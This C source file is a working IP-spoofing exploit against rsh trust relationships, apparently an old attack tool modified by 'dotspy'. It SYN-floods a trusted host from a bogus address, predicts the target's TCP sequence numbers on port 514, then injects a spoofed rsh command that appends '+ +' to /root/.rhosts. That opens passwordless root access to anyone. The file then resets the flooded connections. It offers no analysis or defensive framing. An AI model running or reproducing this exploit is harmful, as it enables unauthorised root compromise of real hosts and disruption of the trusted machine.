/* Under Solaris try:
 *	gcc x.c -lsocket -lnsl -L/usr/ucblib -lucb
 * Modded by dotspy - To run comment out iph->saddr = sk->saddr; from raw.c
 */

#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in_systm.h>
#include <netinet/in.h>
#include <net/if.h>
#include <netinet/ip.h>
#ifdef sun
#include <netinet/tcp.h>
#else /* Linux */
#include <netinet/ip_tcp.h>
#endif
#include <errno.h>
#include <netdb.h>

#ifdef sun
struct iphdr {
        u_char  version:4,                 /* version */
                ihl:4;                /* header length */
        u_char  tos;                 /* type of service */
        short   tot_len;                 /* total length */
        u_short id;                  /* identification */
        short   frag_off;                 /* fragment offset field */
        u_char  ttl;                 /* time to live */
        u_char  protocol;                   /* protocol */
        u_short check;                 /* checksum */
        unsigned long saddr, daddr; /* source and dest address */
};
#endif

/*
 * Pinched from ping.c
 * -------------------
 * in_cksum --
 *  Checksum routine for Internet Protocol family headers (C Version)
 */
unsigned short in_cksum(addr, len)
    u_short *addr;
    int len;
{
    register int nleft = len;
    register u_short *w = addr;
    register int sum = 0;
    u_short answer = 0;
 
    /*
     * Our algorithm is simple, using a 32 bit accumulator (sum), we add
     * sequential 16 bit words to it, and at the end, fold back all the
     * carry bits from the top 16 bits into the lower 16 bits.
     */
    while (nleft > 1)  {
        sum += *w++;
        nleft -= 2;
    }
 
    /* mop up an odd byte, if necessary */
    if (nleft == 1) {
        *(u_char *)(&answer) = *(u_char *)w ;
        sum += answer;
    }
 
    /* add back carry outs from top 16 bits to low 16 bits */
    sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */
    sum += (sum >> 16);         /* add carry */
    answer = ~sum;              /* truncate to 16 bits */
    return(answer);
}

inline void printtcppacket(int r, char *buf, struct sockaddr_in *addr)
{
	struct iphdr *ip;
	struct tcphdr *tcp;
	int len=-1;

        printf("-------------------------------------------------------------------------------\n");
        /* IP */
        printf("Packet Size = %d\n",r);
        addr->sin_addr.s_addr = ntohl(addr->sin_addr.s_addr);
        ip = (struct iphdr *) buf;
        len = ip->ihl << 2;
	printf("IP Header\n");
	printf("---------\n");
        printf("length %d, version %d\n",len,ip->version);
	printf("tos %d, tot_len %d\n",ip->tos, ntohs(ip->tot_len));
	printf("id %d, frag_off %d, ttl %d, protocol %d\n",ntohs(ip->id),ntohs(ip->frag_off),
		ip->ttl, ip->protocol);
	printf("check %d\n",ntohs(ip->check));
	printf("IPFrom %s, ",inet_ntoa(ip->saddr));
	printf("IPTo %s\n",inet_ntoa(ip->daddr));
 
        /* TCP */
        tcp = (struct tcphdr *) (buf + len);
 
	printf("TCP Header\n");
	printf("----------\n");
        printf("SPort = %hu, DPort = %hu, SeqNum = %lu, AckNum = %lu\n",
                ntohs(tcp->th_sport), ntohs(tcp->th_dport),
                ntohl(tcp->th_seq), ntohl(tcp->th_ack));
	printf("x2 %d, off %d\n",tcp->th_x2,tcp->th_off);
 
        printf("Flags");
        if (!tcp->th_flags)
                printf(" none");
        else {
                if (tcp->th_flags & TH_FIN)
                        printf(" FIN");
                if (tcp->th_flags & TH_SYN)
                        printf(" SYN");
                if (tcp->th_flags & TH_RST)
                        printf(" RST");
                if (tcp->th_flags & TH_PUSH)
                        printf(" PUSH");
                if (tcp->th_flags & TH_ACK)
                        printf(" ACK");
                if (tcp->th_flags & TH_URG)
                        printf(" URG");
        }
        printf(".\n");
	printf("win %d, sum %d, urp %d\n",ntohs(tcp->th_win),ntohs(tcp->th_sum),ntohs(tcp->th_urp));
}
 
inline void gettcppacket(int s, char *buf, int size)
{
	struct sockaddr_in addr;
	struct iphdr *ip;
	struct tcphdr *tcp;
	int len, r;

	len = sizeof(addr);
	if ((r = recvfrom(s,buf,size,0,(struct sockaddr *) &addr,&len)) == -1) {
		perror("recvfrom");
		fprintf(stderr,"error: recvfrom returned %d\n",r);
		exit(1);
	}

	/*
	printtcppacket(r,buf,&addr);
	*/

}

inline void sendtcppacket(int s, unsigned long src, unsigned long dest, 
	struct sockaddr_in *addr,
	unsigned char flags, unsigned short sport, unsigned short dport, 
	unsigned long seqnum, unsigned long acknum, char *data, int datalen)
{

	struct iphdr ip;
	struct tcphdr tcp;
	static char packet[4096];
	char tcpbuf[4096];
	char *ptr;
	unsigned short size=0;

	ip.ihl = 5;
	ip.version = 4;
	ip.tos = 0;
	ip.tot_len = htons(40 + datalen);
	ip.id = htons(666+(rand()%100));
	ip.frag_off = 0;
	ip.ttl = 255;
	ip.protocol = IPPROTO_TCP;
	ip.check = 0;
	ip.saddr = src;
	ip.daddr = dest;

	ip.check = in_cksum((char *)&ip,sizeof(ip));

	tcp.th_sport = htons(sport);
	tcp.th_dport = htons(dport);
	tcp.th_seq = htonl(seqnum);
	tcp.th_ack = htonl(acknum);
	tcp.th_x2 = 0;
	tcp.th_off = 5;
	tcp.th_flags = flags;
	tcp.th_win = htons(10052);
	tcp.th_sum = 0;
	tcp.th_urp = 0;

	/* Add in a pseudo IP header */
	memset(tcpbuf,0,4096);
	ptr = tcpbuf;
	memcpy(ptr,&(ip.saddr),8); /* Both saddr and daddr */
	ptr += 9; /* Skip the 0 field */
	memcpy(ptr,&(ip.protocol),1);
	ptr += 1;
	size = htons(datalen + sizeof(tcp));
	memcpy(ptr,&(size),2);
	ptr += 2;
	memcpy(ptr,&tcp,sizeof(tcp)+datalen);

	tcp.th_sum = in_cksum((char *)tcpbuf,sizeof(tcp)+12+datalen);

	memcpy(packet,(char *)&ip,sizeof(ip));
	memcpy(packet+sizeof(ip),(char *)&tcp,sizeof(tcp));
	memcpy(packet+sizeof(ip)+sizeof(tcp),(char *)data,datalen);

/*
	printtcppacket(sizeof(ip)+sizeof(tcp)+datalen,packet,addr);
*/

	if (sendto(s,packet,sizeof(ip)+sizeof(tcp)+datalen,0,
		(struct sockaddr *)addr, sizeof(struct sockaddr_in)) == -1) {
		perror("sendto");
		exit(1);
	}

}

void determine_sequence(int s, int r, unsigned long src, unsigned long dest,
	struct sockaddr_in *addr,
	unsigned long *next_seq, unsigned long *offset)
{
    struct iphdr *ip;
    struct tcphdr *tcp;
    int i, len;
    unsigned long start_seq=4321965+getpid();
    unsigned long start_port=600;
    char buf[4096];
    unsigned long prev_seq=0, diff=0;
 
    *offset=0;

	for (i=0;i<10;i++) {
		sendtcppacket(s,src,dest,addr,TH_SYN,start_port,514,start_seq,0,NULL,0);
 
		for (;;) {
			gettcppacket(r,buf,sizeof(buf));
			ip = (struct iphdr *) buf;
			if (ip->saddr != dest)
				continue;
			/*
			printtcppacket(sizeof(buf),buf,addr);
			*/
			len = ip->ihl << 2;
			tcp = (struct tcphdr *) (buf+len);
            if (ntohs(tcp->th_dport)==start_port &&
                ntohs(tcp->th_sport)==514) {
                    if (prev_seq) {
                        diff=tcp->th_seq-prev_seq;
                        printf("(prev=%u, new=%u, diff=%u\n", prev_seq,
                            tcp->th_seq, diff);
                    } else
                        diff=0;
                    if (*offset==0)
                        *offset=diff;
                    else {
                        if (*offset!=diff)
                            printf("Difference in Offset: old=%u, new=%u\n",
                                *offset, diff);
                        *offset=diff;
                    }
                    prev_seq=tcp->th_seq;
					sendtcppacket(s,src,dest,addr,TH_RST,start_port++,514,start_seq++,0,NULL,0);
                    break; /* out of for loop */
                }
        }
    }
    *next_seq=prev_seq+*offset;
}

void spoof(int s, unsigned long src, unsigned long dest,
	struct sockaddr_in *addr, unsigned long next_seq)
{
    char buf[4096];
    /* unsigned short port=513; */
       unsigned short port=6969;

    char *string="0\0root\0root\0echo + + >>/root/.rhosts\0";
    int stringlen=32;

    u_long seq=54378435;
    int i;
 
    /* Send a syn with our own sequence number */
	sendtcppacket(s,src,dest,addr,TH_SYN,port,514,seq,0,NULL,0);
    usleep(5000); /* wait for the other side to SYN,ACK */
 
	sendtcppacket(s,src,dest,addr,TH_ACK,port,514,seq,++next_seq,NULL,0);
 
	sendtcppacket(s,src,dest,addr,TH_ACK,port,514,seq,next_seq,string,stringlen);
    seq+=stringlen;
 
    sleep(1);
	sendtcppacket(s,src,dest,addr,TH_FIN,port,514,seq,next_seq,NULL,0);
 
    for (i=1;i<4;i++) {
        sleep(2);
		sendtcppacket(s,src,dest,addr,TH_ACK,port,514,seq+1,next_seq+i,NULL,0);
    }
    usleep(50000);

	sendtcppacket(s,src,dest,addr,TH_RST,port,514,seq+1,next_seq+4,NULL,0);
}

void reset_trusted(int s, unsigned long src, unsigned long dest,
	struct sockaddr_in *addr,
	unsigned long seq_num[80], unsigned long port_num[80])
{
    int i;
 
    for (i=0;i<80;i++)
		sendtcppacket(s,src,dest,addr,TH_RST,port_num[i],513,seq_num[i],0,NULL,0);
}

void hose_trusted(int s, unsigned long src, unsigned long dest,
	struct sockaddr_in *addr,
	unsigned long seq_num[80], unsigned long port_num[80])
{
    int i;
    unsigned long start_seq=78156767+getpid();
    unsigned long start_port=600; 
 
    for (i=0;i<80;i++) {
        port_num[i]=start_port++;
        seq_num[i]=start_seq++;
		sendtcppacket(s,src,dest,addr,TH_SYN,port_num[i],513,seq_num[i],0,NULL,0);
    }
}

void main(int argc, char *argv[])
{

	int rec, sen, i=1;
	unsigned char buf[4096];
	struct sockaddr_in addr, trustedaddr, bogusaddr;
	char *bogusname = "19.17.14.17";               
	unsigned long dest, bogus, trusted, src, nseq, offset;
	struct hostent *host;
	unsigned long seq_num[80], port_num[80];

	if (argc != 3) {
		fprintf(stderr,"Usage: %s trusted target\n",argv[0]);
		exit(1);
	}

	memset(&trustedaddr,0,sizeof(trustedaddr));
	trustedaddr.sin_family = AF_INET;
	if ((trustedaddr.sin_addr.s_addr = inet_addr(argv[1])) == -1) {
		if ((host = gethostbyname(argv[1])) == NULL) {
			printf("Unknown host %s.\n",argv[1]);
			exit(1);
		}
		trustedaddr.sin_family = host->h_addrtype;
		memcpy((caddr_t) &trustedaddr.sin_addr,host->h_addr,host->h_length);
	}
	printf("Trusted is %s\n",inet_ntoa(trustedaddr.sin_addr.s_addr));
	memcpy(&trusted,(char *)&trustedaddr.sin_addr.s_addr,4);

	memset(&addr,0,sizeof(addr));
	addr.sin_family = AF_INET;
	if ((addr.sin_addr.s_addr = inet_addr(argv[2])) == -1) {
		if ((host = gethostbyname(argv[2])) == NULL) {
			printf("Unknown host %s.\n",argv[2]);
			exit(1);
		}
		addr.sin_family = host->h_addrtype;
		memcpy((caddr_t) &addr.sin_addr,host->h_addr,host->h_length);
	}
	printf("Target is %s\n",inet_ntoa(addr.sin_addr.s_addr));
	memcpy(&dest,(char *)&addr.sin_addr.s_addr,4);

	if ((rec = socket(AF_INET, SOCK_RAW, IPPROTO_TCP)) < 0) {
		perror("error: recv socket");
		exit(1);
	}

	if ((sen = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
		perror("error: send socket");
		exit(1);
	}
	 
#ifdef IP_HDRINCL
	fprintf(stderr,"IP_HDRINCL is set\n");
	if (setsockopt(sen,IPPROTO_IP,IP_HDRINCL,(char *)&i,sizeof(i)) < 0) {
		perror("setsockopt IP_HDRINCL");
		exit(1);
	};
#endif

	gethostname(buf, 128);
	if ((host=gethostbyname(buf))==NULL) {
		fprintf(stderr, "Can't get my hostname!?\n");
		exit(1);
	}
	memcpy(&src,host->h_addr,4);

	bogusaddr.sin_family = AF_INET;
	bogusaddr.sin_addr.s_addr = inet_addr(bogusname);
	memcpy(&bogus,(char *)&bogusaddr.sin_addr.s_addr,4);

	hose_trusted(sen,bogus,trusted,&bogusaddr,seq_num,port_num); 

	determine_sequence(sen, rec, src, dest, &addr, &nseq, &offset);

	printf("Next sequence number is: %u, offset is: %u\n", nseq, offset);

	spoof(sen,trusted,dest,&trustedaddr,nseq);

	reset_trusted(sen,bogus,trusted,&bogusaddr,seq_num,port_num); 

}


